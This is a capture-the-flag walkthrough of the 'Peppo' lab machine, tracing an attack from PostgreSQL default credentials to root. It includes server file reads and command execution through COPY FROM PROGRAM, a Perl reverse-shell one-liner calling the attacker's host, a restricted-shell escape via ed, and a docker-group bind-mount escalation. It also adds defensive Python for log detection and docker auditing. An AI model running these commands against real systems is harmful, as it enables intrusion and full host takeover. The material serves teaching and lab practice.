# Peppo

`postgresql` `rshell` `restricted shells` `docker`

* Machine name: Peppo
* Difficulty: Hard
* OS: Linux

## Enumeration

### NMAP

```
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-18 08:12 EDT
Nmap scan report for 192.168.233.60
Host is up (0.035s latency).
Not shown: 65529 filtered tcp ports (no-response)
PORT      STATE  SERVICE           VERSION
22/tcp    open   ssh               OpenSSH 7.4p1 Debian 10+deb9u7 (protocol 2.0)
| ssh-hostkey: 
|   2048 75:4c:02:01:fa:1e:9f:cc:e4:7b:52:fe:ba:36:85:a9 (RSA)
|   256 b7:6f:9c:2b:bf:fb:04:62:f4:18:c9:38:f4:3d:6b:2b (ECDSA)
|_  256 98:7f:b6:40:ce:bb:b5:57:d5:d1:3c:65:72:74:87:c3 (ED25519)
|_auth-owners: root
53/tcp    closed domain
113/tcp   open   ident             FreeBSD identd
|_auth-owners: nobody
5432/tcp  open   postgresql        PostgreSQL DB 12.3 - 12.4
8080/tcp  open   http              WEBrick httpd 1.4.2 (Ruby 2.6.6 (2020-03-31))
|_http-title: Redmine
| http-robots.txt: 4 disallowed entries 
|_/issues/gantt /issues/calendar /activity /search
|_http-server-header: WEBrick/1.4.2 (Ruby/2.6.6/2020-03-31)
10000/tcp open   snet-sensor-mgmt?
|_auth-owners: eleanor
| fingerprint-strings: 
|   DNSStatusRequestTCP, DNSVersionBindReqTCP, Help, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, LPDString, RPCCheck, RTSPRequest, SIPOptions, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServer, TerminalServerCookie, X11Probe: 
|     HTTP/1.1 400 Bad Request
|     Connection: close
|   FourOhFourRequest: 
|     HTTP/1.1 200 OK
|     Content-Type: text/plain
|     Date: Sun, 18 Aug 2024 12:15:10 GMT
|     Connection: close
|     Hello World
|   GetRequest, HTTPOptions: 
|     HTTP/1.1 200 OK
|     Content-Type: text/plain
|     Date: Sun, 18 Aug 2024 12:15:04 GMT
|     Connection: close
|_    Hello World
```

### HTTP (8080)

<figure><img src="https://2731053407-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F1RXsXNh9elYzxZgW8W8f%2Fuploads%2FTY5RPyZBLGNPi6SzH6UP%2F9baab028bec941588f21340f5df75e3f.png?alt=media&#x26;token=2a530612-3ace-42db-80d9-e56778de3896" alt=""><figcaption></figcaption></figure>

Redmine?

It is possible to create an account, but an administrator has to approve it. Directory brute-forcing turns up nothing interesting.

### ident (113) : FreeBSD identd

The nmap script already enumerated the ident responses, but we reproduce the lookup with ident-user-enum:

```
┌──(kali㉿kali)-[~]
└─$ ident-user-enum 192.168.233.60 22 53 113 5432 8080 10000
ident-user-enum v1.0 ( http://pentestmonkey.net/tools/ident-user-enum )

192.168.233.60:22	root
192.168.233.60:53	<unknown>
192.168.233.60:113	nobody
192.168.233.60:5432	<unknown>
192.168.233.60:8080	<unknown>
192.168.233.60:10000	eleanor
```

### Postgresql (5432) : PostgreSQL DB 12.3 - 12.4

{% embed url="<https://book.hacktricks.xyz/network-services-pentesting/pentesting-postgresql>" %}

```
┌──(kali㉿kali)-[~]
└─$ psql -h 192.168.233.60 -U postgres            
Password for user postgres:          #postgres
```

```
postgres=# \list
                                                      List of databases
   Name    |  Owner   | Encoding | Locale Provider |  Collate   |   Ctype    | ICU Locale | ICU Rules |   Access privileges   
-----------+----------+----------+-----------------+------------+------------+------------+-----------+-----------------------
 postgres  | postgres | UTF8     | libc            | en_US.utf8 | en_US.utf8 |            |           | 
 template0 | postgres | UTF8     | libc            | en_US.utf8 | en_US.utf8 |            |           | =c/postgres          +
           |          |          |                 |            |            |            |           | postgres=CTc/postgres
 template1 | postgres | UTF8     | libc            | en_US.utf8 | en_US.utf8 |            |           | =c/postgres          +
           |          |          |                 |            |            |            |           | postgres=CTc/postgres
(3 rows)
```

```
postgres=# \du+

 Role name |                         Attributes                         | Description 
-----------+------------------------------------------------------------+-------------
 postgres  | Superuser, Create role, Create DB, Replication, Bypass RLS | 

```

#### Reading files

{% embed url="<https://book.hacktricks.xyz/network-services-pentesting/pentesting-postgresql#read-directories-and-files>" %}

We try to read files on the server.

```
postgres=# CREATE TABLE demo(t text);
CREATE TABLE
postgres=# COPY demo from '/etc/passwd';
COPY 20
postgres=# SELECT * FROM demo;

 root:x:0:0:root:/root:/bin/bash
 daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
 bin:x:2:2:bin:/bin:/usr/sbin/nologin
 sys:x:3:3:sys:/dev:/usr/sbin/nologin
 sync:x:4:65534:sync:/bin:/bin/sync
 games:x:5:60:games:/usr/games:/usr/sbin/nologin
 man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
 lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
 mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
 news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
 uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
 proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
 www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
 backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
 list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
 irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
 gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
 nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
 _apt:x:100:65534::/nonexistent:/usr/sbin/nologin
 postgres:x:999:999::/var/lib/postgresql:/bin/bash
```

## Initial access

### RCE

```
postgres=# CREATE TABLE cmd_exec(cmd_output text);
CREATE TABLE
postgres=# COPY cmd_exec FROM PROGRAM 'id';
COPY 1
postgres=# SELECT * FROM cmd_exec;

                               cmd_output                               
------------------------------------------------------------------------
 uid=999(postgres) gid=999(postgres) groups=999(postgres),101(ssl-cert)

```

```
postgres=# COPY cmd_exec FROM PROGRAM 'perl -MIO -e ''$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"192.168.45.176:8080");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;''';
COPY 0
```

```
┌──(kali㉿kali)-[~]
└─$ nc -lnvp 8080
listening on [any] 8080 ...
connect to [192.168.45.176] from (UNKNOWN) [192.168.233.60] 52196
whoami
postgres
```
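
From the defender's side, the chain above (a superuser login over the network, a COPY from a server-side file, then COPY FROM PROGRAM) is visible in the PostgreSQL server log once statement logging is on. The Python below is an added example and not part of the original write-up: it runs three detection rules over a constructed log excerpt, assuming `log_statement = 'all'`, `log_connections = on` and the `log_line_prefix` given in the comment, and that `postgres` is the only superuser role.

```python
import re

# Constructed PostgreSQL server log excerpt (not a real capture), assuming
# log_statement = 'all', log_connections = on, log_line_prefix = '%m [%p] %u@%d %h '.
SAMPLE_LOG = """\
2024-08-18 12:20:01.120 UTC [2210] postgres@postgres 192.168.45.176 LOG:  connection authorized: user=postgres database=postgres
2024-08-18 12:20:05.432 UTC [2210] postgres@postgres 192.168.45.176 LOG:  statement: CREATE TABLE demo(t text);
2024-08-18 12:20:09.877 UTC [2210] postgres@postgres 192.168.45.176 LOG:  statement: COPY demo from '/etc/passwd';
2024-08-18 12:21:30.004 UTC [2210] postgres@postgres 192.168.45.176 LOG:  statement: COPY cmd_exec FROM PROGRAM 'id';
2024-08-18 12:25:00.500 UTC [2231] redmine@redmine 127.0.0.1 LOG:  statement: SELECT * FROM issues WHERE id = 3;
"""

LINE_RE = re.compile(r"^(?P<ts>\S+ \S+ \S+) \[(?P<pid>\d+)\] (?P<user>[^@\s]+)@(?P<db>\S+) "
                     r"(?P<host>\S+) (?P<level>[A-Z]+):\s+(?P<msg>.*)$")
# COPY ... FROM PROGRAM runs a shell command as the server's OS user (needs superuser
# or pg_execute_server_program); COPY ... FROM '/path' reads a server-side file.
PROGRAM_RE = re.compile(r"\bCOPY\b.*\bFROM\s+PROGRAM\b(?:\s+'((?:[^']|'')*)')?", re.I)
FILE_RE = re.compile(r"\bCOPY\b.*\bFROM\s+'(/(?:[^']|'')*)'", re.I)
AUTH_RE = re.compile(r"connection authorized: user=(\S+)")


def find_alerts(log_text, superusers=frozenset({"postgres"}),
                local_hosts=frozenset({"127.0.0.1", "::1", "[local]"})):
    """Return (severity, rule, pid, detail) tuples, in log order."""
    alerts = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        msg, host, pid = m["msg"], m["host"], int(m["pid"])
        auth = AUTH_RE.search(msg)
        if auth and auth.group(1) in superusers and host not in local_hosts:
            alerts.append(("medium", "remote superuser login", pid, f"{auth.group(1)} from {host}"))
        if not msg.startswith("statement: "):
            continue
        sql = msg[len("statement: "):]
        prog = PROGRAM_RE.search(sql)
        if prog:
            alerts.append(("high", "server-side command execution", pid, prog.group(1) or sql))
            continue  # do not also report it as a file read
        f = FILE_RE.search(sql)
        if f:
            alerts.append(("high", "server-side file read", pid, f.group(1)))
    return alerts
```

On a real server, feed it the current file under `log_directory`; the remote-superuser rule only makes sense once `pg_hba.conf` restricts where superuser roles may connect from.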

We then get stuck: we are inside a Docker container and there is no way out of it... So we go back to our notes and remember that we have a username from the ident service: eleanor.

Of course, the password is the same as the username...

```
┌──(kali㉿kali)-[~]
└─$ ssh eleanor@192.168.233.60

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
eleanor@peppo:~$ 
```

We land in a restricted shell; we need to find out which commands are available in it so we can use one of them to break out.

```
eleanor@peppo:~$ echo $PATH
/home/eleanor/bin
eleanor@peppo:~$ ls /home/eleanor/bin
chmod  chown  ed  ls  mv  ping	sleep  touch
```

We look up on GTFOBins which of these commands can give a shell, and find ed.

{% embed url="<https://gtfobins.github.io/gtfobins/ed/#shell>" %}

We then need to change the PATH:

```
eleanor@peppo:~$ ed
!/bin/bash
eleanor@peppo:~$ ls
bin  helloworld  local.txt
eleanor@peppo:~$ cat local.txt
bash: cat: command not found
eleanor@peppo:~$ whoami
bash: whoami: command not found
eleanor@peppo:~$ echo $PATH
/home/eleanor/bin
eleanor@peppo:~$ export PATH=/usr/local/bin:/usr/local/sbin:/usr/bin:/usr/sbin:/bin:/sbin/:$PATH
eleanor@peppo:~$ echo $PATH
/usr/local/bin:/usr/local/sbin:/usr/bin:/usr/sbin:/bin:/sbin/:/home/eleanor/bin
```

## Privilege escalation

```
eleanor@peppo:/tmp$ id
uid=1000(eleanor) gid=1000(eleanor) groups=1000(eleanor),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),999(docker)
```

The docker group is exploitable.

We pull a Docker image on our own machine and then transfer it to the target.

```
┌──(kali㉿kali)-[/home/kali]
└─# docker pull ubuntu
Using default tag: latest
latest: Pulling from library/ubuntu
Digest: sha256:8a37d68f4f73ebf3d4efafbcf66379bf3728902a8038616808f04e34a9ab63ee
Status: Downloaded newer image for ubuntu:latest
docker.io/library/ubuntu:latest
                                                                         
┌──(kali㉿kali)-[/home/kali]
└─# docker save -o ubuntu.tar ubuntu
```

We start a Python web server on port 10000.

```
┌──(kali㉿kali)-[~]
└─$ python -m http.server 10000
Serving HTTP on 0.0.0.0 port 10000 (http://0.0.0.0:10000/) ...
192.168.233.60 - - [18/Aug/2024 11:13:59] "GET /ubuntu.tar HTTP/1.1" 200
```

```
eleanor@peppo:/tmp$ wget http://192.168.45.176:10000/ubuntu.tar
--2024-08-18 11:14:00--  http://192.168.45.176:10000/ubuntu.tar
Connecting to 192.168.45.176:10000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 80569856 (77M) [application/x-tar]
Saving to: ‘ubuntu.tar’

ubuntu.tar     100%  76.84M  5.45MB/s    in 14s         

2024-08-18 11:14:15 (5.31 MB/s) - ‘ubuntu.tar’ saved [80569856/80569856]

eleanor@peppo:/tmp$ docker load -i ubuntu.tar
f36fd4bb7334: Loading layer  80.56MB/80.56MB
Loaded image: ubuntu:latest
eleanor@peppo:/tmp$ docker run -v /:/mnt -it ubuntu chroot /mnt
```

We now have access to every file. We could also have used the images already present on the machine directly, with `docker run -v /:/mnt --rm -it redmine chroot /mnt sh`.

We can then retrieve the flag, or try to crack the shadow file.
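
Membership of the docker group is equivalent to root, because any member can start a container with the host's root filesystem bind-mounted, exactly as above. As an added example that is not part of the original write-up, the Python below audits the two things a defender checks on such a host: who is in the docker group, and whether any container is privileged or bind-mounts a sensitive host path. The `/etc/group` excerpt and the `docker inspect` JSON are constructed, and the container name `gallant_x` is made up.

```python
import json

# Constructed inputs (not captures from the target): an /etc/group excerpt and the
# JSON that `docker inspect` prints for two containers, reduced to the fields read here.
GROUP_FILE = """\
root:x:0:
sudo:x:27:
docker:x:999:eleanor
"""
INSPECT_JSON = json.dumps([
    {"Name": "/redmine", "HostConfig": {"Privileged": False},
     "Mounts": [{"Type": "volume", "Source": "/var/lib/docker/volumes/redmine/_data",
                 "Destination": "/usr/src/redmine/files", "RW": True}]},
    {"Name": "/gallant_x", "HostConfig": {"Privileged": False},
     "Mounts": [{"Type": "bind", "Source": "/", "Destination": "/mnt", "RW": True}]},
])

# Host paths whose bind mount hands the container control of the host.
SENSITIVE = ("/etc", "/root", "/home", "/var/run/docker.sock", "/proc", "/sys")


def docker_group_members(group_text):
    """Users listed in the docker group; each of them is effectively root on the host."""
    for line in group_text.splitlines():
        fields = line.split(":")
        if len(fields) == 4 and fields[0] == "docker":
            return [u for u in fields[3].split(",") if u]
    return []


def sensitive_host_path(path):
    return path == "/" or any(path == p or path.startswith(p + "/") for p in SENSITIVE)


def risky_containers(inspect_json):
    """(name, reason) pairs for privileged containers and sensitive bind mounts."""
    findings = []
    for c in json.loads(inspect_json):
        name = c.get("Name", "").lstrip("/")
        if c.get("HostConfig", {}).get("Privileged"):
            findings.append((name, "privileged"))
        for m in c.get("Mounts", []):
            if m.get("Type") == "bind" and sensitive_host_path(m.get("Source", "")):
                mode = "rw" if m.get("RW") else "ro"
                findings.append((name, f"bind {m['Source']} -> {m['Destination']} ({mode})"))
    return findings


def audit(group_text, inspect_json):
    return {"docker_group_members": docker_group_members(group_text),
            "containers": risky_containers(inspect_json)}
```

On a live host, pass the contents of `/etc/group` and the output of `docker inspect $(docker ps -aq)`; an empty docker group and an empty findings list is the expected state for a server that only needs to run the Redmine and PostgreSQL containers.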
